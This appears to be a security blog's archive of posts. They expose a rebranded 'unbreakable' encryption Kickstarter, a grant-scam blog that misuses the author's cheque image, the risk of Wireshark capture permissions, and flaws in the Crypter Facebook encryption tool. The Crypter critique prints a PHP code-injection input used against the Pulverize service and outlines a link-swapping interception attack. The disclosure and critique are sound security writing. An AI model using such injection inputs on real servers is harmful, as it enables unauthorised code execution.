2013-10-15Raymond Talarico is compensated by SE&R for services through his majority owned company IntelaKare Marketing, Inc. with 129,400 shares of common restricted stock of SE&R and a $10,000 monthly payment.sec.gov
2013-10-18Centuri Cryptor claimed to have been presented at a nameless show at the Jacob Javits Center in New York City to a crowd of 40,000 people. Said convention centre held the PIX11 Health and Wellness Show and 135th International AES Convention that weekend.healthexpo.pix11plus.com
2013-10-18Alan Edwards of Whitehorse Technology Solutions LLC registers unbreakable-encryption.com and provides details on Centuri's unbreakable statusunbreakable-encryption.com
2013-10-22"Alan9701" of Whitehorse Technology Solutions LLC claims to have demoed the application and found it uncrackable. It was his first response to any SpiceWorks community message.community.spiceworks.com
2013-11-21Matthew Sage registers FileWarden.com with Centuri Global as the registrant organization.
2013-11-27Talarico registers xtremehacker.com, xtremehackergames.com, hackmeifucan.com
2013-12-11Raymond Talarico registers MoneyWarden.com, reflecting the FileWarden branding
2014-01-29Raymond J. Talarico appointed CEO of SE&Rbloomberg.com
2014-02-12SE&R files name change with SEC for FileWarden.comsec.gov
2014-03-28FileWarden.com's Matthew H. Sage applies to operate a business in the State of Florida. Raymond Talarico is cited as President and Director.search.sunbiz.org
2014-07-11Raymond J. Talarico resigns as Director of Filewarden.combloomberg.com
2014-07-11Talarico registers idataangel.com, mydataangel.com
2014-07-14FileWarden.com delisted from OTCBBbloomberg.com
2014-07-16Talarico registers datagatekeeper.com
2014-11-15Talarico registers safedatazone.com
2014-11-17State of Wisconsin issues C&D against Secured Income Reserve, Inc., Ilona Alexis (a/k/a Roza) Mandelbaum, Matthew H. Sage. David A. Zimmerman, and Tamda Marketing, Inc. for selling unregistered securitieswdfi.org
2014-12-01MyDataAngel.com, Inc. incorporated in Florida by Debra Towsleysearch.sunbiz.org
2015-02-04Talarico registers mydataangle.com
2015-02-09FileWarden demo video posted to Youtube by "Nick Scott" youtube.com
2015-08-08Talarico registers datagatekeeper.tv, safedatazone.tv
2015-09-11Talarico creates a demo video on how MDA worksyoutube.com
2015-09-12Talarico registers dataincidentreport.com, miangeldedatos.com, mydatatv.com, worlddataheadquarters.com
2015-09-18"About MyDataAngel.com" posted on Youtubeyoutube.com
2015-10-23Talarico registers safedatasolution.com
2015-11-11MyDataAngel.com issues an "executive brief"Mirror
2015-11-24dataangel.news is registered by Raymond Talarico
2015-12-10MyDataAngel.com issues a year-end update for its investors. Mirror
2015-12-16MyDataAngel.com issues a PowerPoint presentation with an overview of their new product. Henryk (Henry) Mandelbaum is cited as CTO, Raymond Talarico as Founder and CEO, and Debra Towsley as Founder and President.Mirror
2016-01-15Talarico registers edatabuzz.com, edatanews.com, edatatareporter.com
2016-04-01Installation tutorial postedyoutube.com
2016-04-01First use tutorial postedyoutube.com
2016-04-05DataGateKeeper help document created.Mirror
2016-05-13MyDataAngel.com KickStarter is launched.kickstarter.com

So what does this all mean? For one, the individuals involved have been scheming for years through the use of holding companies to launch their own ventures.

Sometime shortly before 2010, Centuri Cryptor was written although based on its design, it's really tough to say if it was not started earlier, had an incompetent programmer involved, or was actually written later than what is claimed on LinkedIn. The use of controls reminiscent of Windows 3.1 is really confusing. The first evidence of the application in use does not appear on YouTube until the summer of 2013.

It is at this point that Ilona Mandelbaum arranged a compensation package for Raymond Talarico's involvement in HSC Holdings (the assumed owner of Centuri) several months after Mandelbaum's mining company transitioned into a technology one. A website was launched mentioning Henry Mandelbaum as CTO and Matthew Sage as COO.

Immediately following Talarico's involvement, promotion of Centuri began via Twitter and a supposed, nameless conference in New York City. All of this appeared to be very feckless and a non-starter however.

At some point, Matthew Sage created FileWarden.com and transitioned Centuri over to that company with him and Talarico at the helm. Talarico then resigns from FileWarden just four months later but shortly before Mandelbaum and Sage were issued a cease and desist order by the State of Wisconsin for their business activities in another organization.

Eight months later, Talarico registers MyDataAngel.com, with Henry Mandelbaum (a relative of Ilona) as CTO, Talarico as CEO, and Debra Towsley as President. In November of 2015, work begins on creating a KickStarter and involvement of investors is suggested. And now in May 2016, we have the KickStarter where they're asking for $25,000 USD but with no mention of Henry or Ilona Mandelbaum.

Does the application even exist?

It's really tough to say but probably? The aforementioned YouTube video shows it in use but there are lot of problems with its claims.

The cryptography claims that it's using a kilobyte-sized keyspace is absurd and the idea that AES is weak in contrast to them is just as much. They're offering fifty to one-hundred year protection meanwhile with the right implementation of AES, you could be waiting until the heat-death of the universe to crack the data.

MyDataAngel, DataGateKeeper, Centuri Cryptor, FileWarden, or whatever it is called is complete garbage. They don't need $25,000 to launch this application: it's already available or at least is.

Here it is in 2015 (as FireWarden):

And here it is in 2013 (as Centuri):

And here's Talarico's video of him using it with Centuri's name being mentioned:

Lastly, for shits and giggles, here are some amusing folders:

Whose ethics?

My problem

KickStarter's lack of involvement in addressing these scams is really distressing as there is no legal recourse for someone in the event that it doesn't follow through on its promises. This is the third time that a campaign for security software that's outlandish and I am willing to believe that there will be no response from them on preventing new ones in the future. It's really up to us as a community to pressure these snake oil products from never seeing the light of day.

Raymond Talarico and Debra Towsley don't need the $25,000 either. As evident in the PDFs I've linked to, they claim to have investors and based on the YouTube videos, the software already exists.

This is probably not the last time we'll have to write about this sort of thing either.

I'll close off with this: someone forgot to re-register centuriglobal.com, the former domain of Centuri Cryptor so it now redirects to this blog piece.

Monday, 9 May 2016

My "new" blog funded by Canadian government "grant cheques"

It's often said that imitation is the sincerest form of flattery. However, I did not expect to ever see my name used to promote some grant scheme where one could make $17,438.27 in just under two weeks.

During a random search, I came across a YouTube account bearing my full name. I only have one account that I use so I was surprised to see a video claiming to be created by me bearing a cheque with my full name.

Now, the video in question has a link to the blog itself (I will not link to it myself) which claims the following:
My life was going great... a great job working at a local engineering firm, a beautiful wife of 4 years and a young son. Sure we had some debt, but really, who doesn't? Then it happened, i lost my job! It was devastating, but the next day i was out looking for a new job. Weeks went by and as hard as i tried to find another job, no one, i mean no one was hiring! All the while our bills kept piling up and my mortgage payments were way behind. We really did think we were going to lose our home!
And then goes on to explain how this whole grant scheme:
One day after a job interview at a local coffee shop, i was about to sit down to enjoy a hot cup of java when i happened to bump into an old high school acquaintance. Turns out he worked for the provincial government and after explaining about my financial problems, he advised me to apply for Canadian Government Grants. I had heard about them but never really looked into it before. He explained that 90% of Canadians qualify for these grants but maybe only 5% of the population actually know about them. He gave me a website to look into and i didn't even finish my coffee, i just rushed home.
Convenient story. The last time I ran into someone from high school that told me of a financial scheme where I could make money, she tried to rope me into some multi-level marketing nonsense.

To add to this, how does one go from having worked at an engineering firm where you're gainfully employed enough to have a mortgage on a home to having needing to apply for a job at a coffee shop? I get that times are tough now in Calgary (where the author claims to be from), but this was written back in 2012 when oil prices were around $90 USD a barrel.

Rolling back here a bit, you might be wondering how a cheque bearing my name (with middle initial no less) made it online. For a bit, I was confused but then I remembered that back in 2003, I was filing my own taxes for the first time and was sent back a cheque for a grand total of $0.07 CAD. The humourous part was that the cost to mail it would have been $0.48 CAD. Since I found it funny, I scanned a copy of the cheque, edited out details, and then posted on a message board.

Years later, I got into the habit of editing Wikipedia to pass the time when I was living away from my hometown. When I came across the article on cheques, it at the time either had no images or didn't have enough so I decided to lend my previous scanned image. The easiest thing to assume here is that this individual decided to use the image in their video because it had a full name to make use of and fit their assumption of how convincing it would be.

I was able to confirm that this was my cheque because the monospace font matches the address I would have had at the time of the cheque's issuance. There are other people out there who have the same name as me, but it definitely was my image being used here.

Back to this whole grants nonsense, there are actual grants you can get as a business or an individual looking to run a business if you fall under some of the following as per this website with a horribly deceptive domain:
  • Employ PEI - as a PEI business owner, you can apply for a wage subsidy to hire and train eligible individuals for up to a year
  • Fuel Injection Program - your advanced manufacturing or social innovation business could access up to $30,000 in seed funding for growth projects in Southern Ontario
  • Self-Employment Assistance - if you are unemployed and want to create a job for yourself by starting your own business, you may be eligible for financial and entrepreneurial assistance
  • Sivummut Grants to Small Businesses - if you live in the Baffin (Qikiqtaaluk) region of Nunavut, you could get up to $25,000 to start or grow a business
  • B.C. Buy Local Program - if you are in the agriculture, agrifood or seafood sectors, you could receive funding up to $75,000
As you can see, there are plenty of grants available that can get you a lot of money for your existing business or to get one off of the ground. However, all of these have a lengthy-ish application process and you have to prove what you're looking to do is legitimate. This isn't some scheme where the government will throw $40,000 like the blog suggests for doing absolutely nothing, as you have to commit to doing whatever the government is trying to promote.

These grant scams are not really all that new as there have been reports about them going back to before this blog came into existence in 2012; a more recent article mentioned this scam in 2015.

The photos on the blog itself came from some stock image websites. You can see some of them here:

What a very happy family.

If you're curious about the cheque image itself, it was deleted from Wikipedia in 2011 so it doesn't appear to be anywhere on the Internet now. I do now have a cheque for $0.07 from TD due to an overpayment on a loan but I have opted to not deposit to see how long things go before they hound me if at all.

I have yet to see my $17,438.27 cheque from the Canadian government.

Wednesday, 2 March 2016

This Medium post about Wireshark is the result of poor system hygene

Ross Hosman posted this Medium entry complaining that 1Password exposes user data via the loopback interface in an unencrypted format.

Ross was nice enough to provide a "TL;DR":
TL:DR 1Password sends your password in clear text across the loopback interface if you use the browser extensions. 
Note: Running Mac OSX 10.11.3, 1Password Mac Store 6.0.1, Extension Version (Chrome)
I posted a response on Reddit but felt like sharing it here too:
This is likely the result of the OP having installed Wireshark and would otherwise not be a problem if he hadn’t done so. 
Countless guides on the Internet recommend doing something like this: 
sudo chown <username> /dev/bpf* 

Now fortunately after a reboot, these permissions get set back automatically. However, Homebrew for OS X by default implements ChmodBPF, which keeps the permissions needed so you don’t have to do this every time after you reboot.
This isn’t a Mac OS X thing either as under Windows, WinPCAP is installed, and Wireshark tells you that any user can make use of it:
The WinPcap driver (called NPF) is loaded by Wireshark when it starts to capture live data. This requires administrator privileges. Once the driver is loaded, every local user can capture from it until it’s stopped again.
So default behaviour in Windows is to allow anyone to make use of the capture driver and it is encouraged in guides and Wireshark themselves to make use of the OS X tool. Under Linux, you need to be a member of the wireshark group in order to make use of the capture interface (or just haphazardly use “root”). 
These details are important because under any other circumstance where Wireshark or any packet capture software is not installed, what the OP complains about would be completely unnecessary to worry about because typically (as in a default, non-SELinux Linux; OS X, or Windows installation) the permissions required to sniff the loopback interface are at the same level as sniffing for the key within memory. 
His concerns are valid in a sense but having a packet capture driver with global access permissions is along the same lines as having no password on your administrator accounts. If you’re concerned about this being a real problem, run Wireshark on a separate machine or at least within a virtual machine.
Overall there is nothing to panic about unless you are running Wireshark.

Tuesday, 9 February 2016

The hype about Crypter is misplaced and overall dangerous

My problem with cryptography boils down to this: every once in a while, someone comes along claiming that they have a system or software that will revolutionize everything. Naturally, a media frenzy ensues with minimal fact checking. The security industry then catches wind of it, and it is quickly and thoroughly demonstrated to be a pile of vaporware garbage. Then we collectively discover that the enterprising individual has also managed to secure a hefty amount of funding and has spent most of it on a swank office and catered lunches.

Recently, several media outlets gave praise to a project by a student at Sussex University named Max Mitchell. This project, called "Crypter", is a tool to enable encrypted conversations using Facebook's chat service.

Here are the headlines that were given (linked directly from Crypter's home page):
Why and how did Max Mitchell get so much coverage for his encryption tool? Likely it stems from this statement in the BGR article:
Imagine you’re Edward Snowden with a Facebook profile. You text an ace reporter at the Guardian and have a new bit of information to share: you totally found a great new coffee place in the heart of Moscow where the CIA can’t poison you with thallium. How do you send that news securely over Facebook Messenger?
On the website they do in fact use Edward Snowden in their examples:

Edward Snowden is sexy to the media and therefore it appears that Max's borrowing of his name was enough to get attention.

It got further press when Facebook reportedly "blocked" the application--something changed that Max didn't account for really. Of course, RT picks up on this and erroneously quotes my sarcasm on Twitter as support.

Too bad that this entire application is complete garbage and doesn't actually protect anyone.

Key exchange or lack thereof

Crypter's developer mentions that "[its] extension locally encrypts and decrypts your Facebook messages using AES encryption along with a preset password" and "[both parties] must have the same password to ensure you can encrypt and decrypt messages correctly". However, Max's proposal for a key exchange is very, very troubling.

There are entire algorithms for exchanging keys (Diffie-Hellman for example), so the idea that a static key needs to be exchanged using some other means is preposterous and someone like Edward Snowden would very likely agree. Exchanging a static key for decryption of a symmetrical encryption algorithm like AES using any other means other than what has been established is going to be made a mess of simply because users will definitely get it wrong.

This is to me the most frustrating aspect of why Crypter is really just a toy and nothing more even if the author and the media are thinking otherwise. The lack of a secure handshake between two or more parties means to me that it'll never be secure.

I ended up asking them on their Facebook page about this problem:

Crypter's website does mention www.⊗.cf (also known as pulverize.xyz), but it's in the "about" section of the page, and not in the "how to use" part, meaning that someone may end up completely missing the service and will just do something else to send the key off--such as just send it in plaintext before. Pulverize is also ridden with problems so even if you were to use it per the author's suggestion, the suggestion that it is an acceptable key exchange method is laughable.

To describe Pulverize, it's a service written by Max himself where you enter some text into a field and it then generates a link that you can exchange with someone else. When someone else views it, the message is destroyed on the server's end and it displays the text itself. If one attempts to view the page again, they'll receive a message that it doesn't exist. To protect the page from being scraped by an automated service, it uses a Google Captcha service to determine whether or not you're a human being.

In theory, this idea could work because once the link is sent to the other party and they retrieve the self-destructing link, it should exist no more. However, it doesn't take into account two things: do you trust the author to destroy the details about the key intentional and or properly and do you also believe that Facebook or some other incepting party doesn't get to it first?

Being that Pulverize is open-source, it's easy to take a look at their source code and issue tracker. Here's how it works:

  1. It generates a fixed-length string (5 characters) using an insecure random number generator to generate a lookup key
  2. It writes a PHP file to the directory containing details about the secret message
  3. Data contained within the PHP file is stripped of all HTML tags, meaning that if you have any special characters in your AES key, they won't show up
  4. When the link is opened by another party, after confirming the captcha, proceed to not quite delete the file
So far we have a potentially predictable URL and data that is stripped of any characters removed by PHP's strip_tags function. There's no assurances that the file is removed either as PHP's unlink function just removes the file headers from the drive, not the file data itself. So in theory, if the server running Pulverize was seized, the data may be recoverable from the hard drive--that is also assuming that the code we see on Github is being truthful as how can you trust that Max is even making any attempt to delete data to begin with?

To add to all this, in prior versions of Pulverize (as in up until last Friday), a remote code execution (RCE) vulnerability existed in its codebase. The aforementioned use of the strip_tags function was what replaced this particular line of code:
This means that one could just put in the following as the text that they want encoded:
<?php phpinfo()?>
Instead of seeing the above line you'd have the output of the phpinfo function, meaning that whatever PHP code you wanted to execute would execute. This would also mean that JavaScript and HTML were all injectable.

For the key exchange, this would have meant that we could have read keys before anyone else without having to worry about them being "destroyed". This sort of RCE should have been spotted from a mile away and yet here we are with Max promoting a crypto tool alongside another tool that is completely inadequate.

Fortunately this has been fixed but we're still dealing with a situation where we're being limited on what characters are acceptable for use on the site and that the data is not entirely being scrubbed from the server. There are far, far better solutions than this but I get the impression that Max hasn't taken the time to read into what he's trying to achieve.

Facebook as an adversary and a lack of verification

So let's take a step back here for a second and assume for a moment that we can trust that Pulverize will destroy all records of that key and let's look at an easy scenario that Crypter likes to portray here: Facebook being the adversary.

Ignoring the fact that if Facebook was an adversary you wouldn't be using it in the first place, how do you know that Facebook isn't intercepting the key exchange itself?

Here are things that Facebook is in control of here:
  1. All messages going back and forth between all involved parties
  2. The formatting of the messages coming in and going out
  3. The collection and storage of the conversation
So what's to stop Facebook from the following:
  • Intercepting a key exchange using Pulverize and then feeding a different link to the other party
  • Interfering with the application by changing the page so you think that you're using Crypter when in fact you're using something Facebook is serving up
  • Using the reduced number of characters available to your key size to determine the key using bruteforce methods
With the first point, this does require some human intervention as Pulverize does require you to go through an image-based captcha in order to make and retrieve encoded text. So yes, it would be difficult for Facebook to automatically retrieve the key without resulting in having either party aware, but what if we decided to just intervene?

We have no verification that the other party is receiving the correct key. In fact, we have no verification that the Pulverize URL that the other party is to receive is the URL that they are to get. If we're dealing with a situation where Facebook has been coerced to intercept traffic going from one party to another, what's to stop them from going through this process?
  1. Intercept and monitor all messages using a human actor
  2. Wait for a Pulverize URL to come in, grab that URL, note the key, make a new Pulverize URL with said key, and then pass the message on
  3. Intercept and decode all messages using the preset key
Since the Pulverize URLs would supposedly be gone and the key is consistent, there is no way to actually confirm that an adversary does or does not have access to the messages.

To add to this, how Crypter goes about enciphering and deciphering text is pretty scary.

Here's the encryption process:
var encrypt = tag+CryptoJS.AES.encrypt(messageContent, getPass($(this)))+tag;
Here's the decryption process:
var decrypt = CryptoJS.AES.decrypt($(this).attr("id"), getPass($(this))).toString(CryptoJS.enc.Utf8);
What's missing here? There's no verification of the message; Max has opted to just encipher and decipher the text without actually verifying that the message in question is actually what was intended. There are a few things to add to this as well (how the key is being used is one problem), but really there is no integrity of the message being sent.

Crypter is garbage and should not be used. I've seen bad things before and have ranted on similar topics, but this takes the cake considering the coverage it got.

Closing off and venting

How does Max know that both parties are getting the messages that they intend to get? Of course, this is what he believes:
Talking encrypted with no password (impossible to do with Crypter) is more secure and private than having no password. We doubt Facebook bots are able to decrypt encrypted text (even if the encrypted text doesn't have a password). We built crypter to *help* with internet security similarly to PGP's (*pretty good* encryption) philosophy but our main ethos is actually privacy. We want to make it harder for facebook and the NSA to know what people are saying to each other over Facebook (see more about us on our website www.crypter.co.uk). We are not claiming that this is a 'bullet proof' application and we don't believe we are "reinventing the wheel". We just see it as having put two things together - Encryption and Facebook.
And what does the website say?
It’s human nature to want privacy. In light of Edward Snowden’s Global Surveillance disclosures, people don’t want their messages stored and analysed regardless of whether their topic of discussion is illegal. Crypter can put millions of people at ease.
So what's the difference between "putting people at ease" and then saying that "it's not bullet-proof"?

Of course, TechCrunch sees it this way:

I’d have a hard time trusting my secret tiramisu recipe to any service. Mitchell has created something that is nearly invisible and seems like it might be a good one-off solution to secure communications between friends, reporters, and secret dessert lovers.
The thing that Max Mitchell and media outlets seem to overlook is that the fact that if an adversary is after you, Facebook and other similar services will never be able to provide a secure platform to communicate over. If Edward Snowden was using Facebook to chat and was using Crypter, I can promise you that at some point somewhere the conversations would become compromised.

There are better solutions out there too. I accused Max of reinventing the wheel and for good reason: why not use OTR? A native JavaScript version has existed for years now and is actively developed. While I lament anything JS-based, it would have been far better than what Max had gone an implemented.

If Max had been paying attention to the whole Edward Snowden fiasco, he'd have known that the secure e-mail service which was centralised like Pulverize  was shutdown to get further information.

I hope that Max sees the light and stops before he does any further damage.